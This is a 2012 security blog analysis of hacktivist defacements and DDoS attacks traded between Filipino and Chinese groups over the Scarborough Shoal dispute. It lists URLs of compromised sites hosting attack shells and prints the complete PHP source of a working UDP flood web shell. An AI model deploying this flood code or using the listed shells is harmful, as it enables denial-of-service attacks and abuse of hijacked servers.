Threat Intelligence

Understanding the Origins of the China - Philippine Cyber War

Jay Turla
May 3, 2012 by
Jay Turla

For many years, there has been a territorial dispute between China and Philippines over the Scarborough Shoal (Philippine Term: Panatag Shoal) or Huangyan Island (Chinese Term) and the Spratlys Island. But the most disputed island today is the Scarborough Shoal because of the growing tension after the Chinese government sent a military vessel or a navy fleet into the South China Sea after rejecting a Philippine proposal to submit the Panatag Shoal dispute.

A few days later, some defacers vandalized the official website of the University of the Philippines and left a note that they were from China and that Huangyan Island is theirs and not the Philippines.

News spread regarding the defacement and intrusion of the hackers, who claim to be from China, and because of that a hacker who goes by the handle busabos retaliated and defaced three Chinese domains: star.chinaumu.org, v.cyol.com and ploft.cn. He also posted the websites in a Facebook fan page called Anonymous #OccupyPhilippines, which has over 1000 likes and counting. This happened on April 21, 2012.


In his defacement he said:

STFU

Chinese government is clearly retarded

Scarborough Shoal

Anonymous #OccupyPhilippines

We are Anonymous, We are legion, We don't forgive, We don't forget

United as one Divided by zero, Expect us.

He also included a logo of a guy wearing a Fawkes mask and an embedded rock soundtrack in his defaced page. It looks like the guy is a supporter of Anonymous based on what he just said on his defacement.

Busabos also added in the Anonymous #OccupyPhilippines Facebook Fan Page that he would rather oppose the actions of the Chinese underground hackers in cyberspace than do nothing about the defacement that they have done and being mass defaced.

For those of you who don't know busabos, he was also the guy behind the 2009-2010 Government Website Intrusions in the Philippines during the pre-election period. In fact, he has a lot of notifications and archived defacements in Zone-H.

After a few minutes, a guy named Supra Dick also showed his four defaced Chinese websites in the same fan page. The websites were:

www.lanseyinxiang.com/phil.html

http://www.sanxinsudi.com/index.html

http://gh.rc.gov.cn

http://www.ryjzw.com


The defacement is a bit funny because the defacer somehow misspelled the word Philippines. (lol)

My first impression with the retaliation of the Pinoy or Filipino hackers over the UP incident is that it could trigger a cyber war between these two countries.

Meanwhile, on Facebook, several images, just like the one below, have also been the "talk of the town" because of the territorial dispute of the two countries.

<

The day after the retaliation, theMalacañang Palace, which is the official residence and workplace of the President of the Republic of the Philippines, called for an end to the cyber-attacks against China because it may worsen the situation and the tension. The assistant secretary and spokesman, Raul Hernandez of the Philippine Department of Foreign Affairs said:

"We denounce such cyber-attacks regardless from which side they are coming from. They are counter-productive and will only add to the tensions. We call on both Filipino and Chinese netizens to be more responsible and encourage dialogue rather than discord."

However, his statement is of no use because they can't control the minds of the people behind the cyber-attacks, and the country has no Cyber Security, Forensics and Information Security agency that takes action in this kind of situation. In fact, the National Bureau of Investigation Anti-Fraud and Computer Crimes Division has been proven ineffective and has no good knowledge on cyber forensics. This is based on my previous interview of busabos, who leaked a chat log of a conversation he had with an NBI agent. Although, the government of the Philippines is looking forward to establishing an agency that deals with this kind of dilemma.

But somehow the statement of Hernandez strikes a point because China is known for state funded cyber espionages, and the underground groups in the Philippines are growing. Thus, it could spark a cyber war. He just wants to call off the guys, and I cannot blame him for that.

Last April 23, 2012, the Presidential Spokesperson Edwin Lacierda issued an official statement saying:

"At around four o'clock in the afternoon of April 23, 2012, the Presidential Communications Development and Strategic Planning Office (PCDSPO) noticed a significant spike in traffic with malicious URL requests from forged user-agents being channeled to the Official Gazette website (URL: www.gov.ph), to the PCDSPO website (URL: www.pcdspo.gov.ph), and to the Presidential Museum and Library website (URL: www.malacanang.gov.ph), causing our servers to momentarily lag. We determined that this was a denial-of-service attack. Information gathered through our data analysis indicated that the attack originated from IP addresses assigned to Chinese networks.

The PCDSPO is endeavoring to maintain its websites. However, please note that we can expect temporary disruption of service while the attack is ongoing."

Is this really a DDoS attack from China or is it just that the servers used were from China and the real perpetrators are not really Chinese? Did they really want to issue an attack that could be traced back to China? No logs were shown by the official, maybe because of confidentiality.

I can't really say that these were from the Chinese because there was no sufficient evidence given by the spokesperson and because who would like to be traced back from an IP address where your country belongs to? But this is just me. If they want real cyber espionage then they would use a different network to initiate a series of Denial of Service attacks (DoS) or Distributed Denial of Service (DDoS) attacks.

After the news spread again, Privatex, which is another underground group in the Philippines, decided to join the Anonymous #OccupyPhilippines group, and they both initiated a second retaliation. This time they called their operation #OpChinaDown. Below are the confirmed websites they pawned:

http://www.ocex.com.cn

http://www.teawindow.com

http://www.higvod.cn

http://www.lzrk.gov.cn

http://lppm.bigc.edu.cn/Pr1vX.htm

http://xxb.leiyang.gov.cn/Pr1vX.htm

http://en.founder.com.cn

http://dxswl.cn

http://www.cord.cn

http://fmprc.gov.cn (DDos or DoS Attack)

http://www.3322.net.cn

http://wahsangtech.com/index.aspx


The two groups that just bonded issued an official statement in pastebin saying:

#OpChinaDown

The recent defacements occurred on certain Chinese websites are just simple responses to what happened to the UP site. You may continue to bully our country's waters but we will not tolerate you from intimidating our own cyber shores.

Those defacements are just mere echoes to what you have initially started. We are not trying to start anything. We are just trying to tell you that we do not want to be bullied in our own cyberspace too.

#OpChinaDown is not a threat. It will be a reply. A reply to future attacks within our cyberspace. We will leave our country's disputes to our government's hands. Yet this does not mean we will not support them.

Scarborough Shoal is ours.

We are Anonymous

We are Legion

We do not Forgive

We do not Forget

United as One

Divided by Zero

Expect Us

@AnonPinas

Aside from defacing Chinese websites, the supporters of the two groups also launched DDoS and DoS attacks against Chinese domains and government websites. In fact, seethered from Anonymous #OccupyPhilippines posted fifteen PHP UDPFlood Shells that he uploaded from fifteen websites he got access to. Below are the sites he posted, which contain UDPFlood Shells:

http://spaneconi.com.mx/upd.php

http://haventheatre.org/upd.php

http://ainamedia.com/upd.php

http://210.127.51.207/upd.php

http://www.courseoutsource.com/upd.php

http://www.tagsystems.org/upd.php

http://cyberretailer.biz/upd.php

http://www.thebirchproductions.com/upd.php

http://minstermemorialsltd.co.uk/upd.php

http://202.200.82.44/webdav/shell.php

http://217.6.136.144/webdav/greenshell.php

http://www.tingsbling.co.uk/upd.php

http://ipswichinflatables.co.uk/upd.php

http://inspireyogabrisbane.com.au/wp-content/themes/striking/cache/images/udp.php

http://www.cutbackprod.com/wp-content/themes/aperture/cache/adik.php

Based on my analysis, seethered uploaded a PHP UDPFlood, which was known to be coded originally by Hexbooter. I happened to get one of the codes of the udpflood shells from one of the sites (not the sites that seethered posted, of course) I cleaned from other backdoor shells. Here is a sample code of the malicious PHP file:

[sourcecode]

<?php

//UDP

if(isset($_GET['host'])&&isset($_GET['time'])){

$packets = 0;

ignore_user_abort(TRUE);

set_time_limit(0);

$exec_time = $_GET['time'];

$time = time();

//print "Started: ".time('d-m-y h:i:s')."

";

$max_time = $time+$exec_time;

$host = $_GET['host'];

for($i=0;$i<65000;$i++){

$out .= 'X';

}

while(1){

$packets++;

if(time() > $max_time){

break;

}

$rand = rand(1,65000);

$fp = fsockopen('udp://'.$host, $rand, $errno, $errstr, 5);

if($fp){

fwrite($fp, $out);

fclose($fp);

}

}

echo "<br><b>UDP Flood</b><br>Completed with $packets (" . round(($packets*65)/1024, 2) . " MB) packets averaging ". round($packets/$exec_time, 2) . " packets per second n";

echo '<br><br>

<form action="'.$surl.'" method=GET>

<input type="hidden" name="act" value="phptools">

IP: <br><input type=text name=host><br>

Length (seconds): <br><input type=text name=time><br>

<input type="submit" value="Go" /><!--<span class="hiddenSpellError" pre=""-->form>';

}else{ echo '<br><b>UDP Flood</b><br>

<form action=? method=GET>

<input type="hidden" name="act" value="phptools">

IP: <br><input type=text name=host value=><br>

Length (seconds): <br><input type=text name=time value=><br><br>

<input type=submit value=Go></form>';

}

?>

[/sourcecode]

Based on the code it sends 65,000 packets per second and allows a user or attacker to input the length of the attack.

"They want Distributed Denial Of Service let's give them DDOS", added one of the administrators of the Anonymous #OccupyPhilippines in their Facebook Fan Page.

And as predicted, some Chinese hackers, who claimed to be members of the Silic Group Hacker Army, were able to penetrate the official government website or the Department of Budget and Management (DBM) Philippines. The hackers left a note saying:

"Hacked! Owned by Chinese Hackers!"

"How come a small bitch border country are overconfident? And challenged to our Chinese super hacker?"

"Remeber: Don't Trouble Chinese, Don't Play with Fire. All Members from Silic Group Hacker Army F*ck your mother and all your F8cking families"

They also included their official flag as the banner of the deface page.

For now, these are tensions escalated in the cyberspace. Although this cyber war between the Filipinos or Pinoys and Chinese is not as deadly as the real war, this could also hurt some of the banks, telecommunications, online businesses and other ecommerce websites if these cyber warriors don't stop.

References:

https://www.facebook.com/pages/Anonymous-OccupyPhilippines/224402790971504

http://globalnation.inquirer.net/34021/china-deploys-gunboat

http://www.gov.ph/2012/04/23/statement-of-the-presidential-spokesperson-on-the-denial-of-service-attack-on-pcdspo-maintained-websites-april-23-2012/

http://www.interaksyon.com/infotech/budget-office-website-defaced-by-suspected-chinese-hackers

Additional Reading:

http://en.wikipedia.org/wiki/Scarborough_Shoal

Jay Turla
Jay Turla

Jay Turla is a security consultant. He is interested in Linux, OpenVMS, penetration testing, tools development and vulnerability assessment. He is one of the goons of ROOTCON (Philippine Hackers Conference). You can follow his tweets @shipcod3.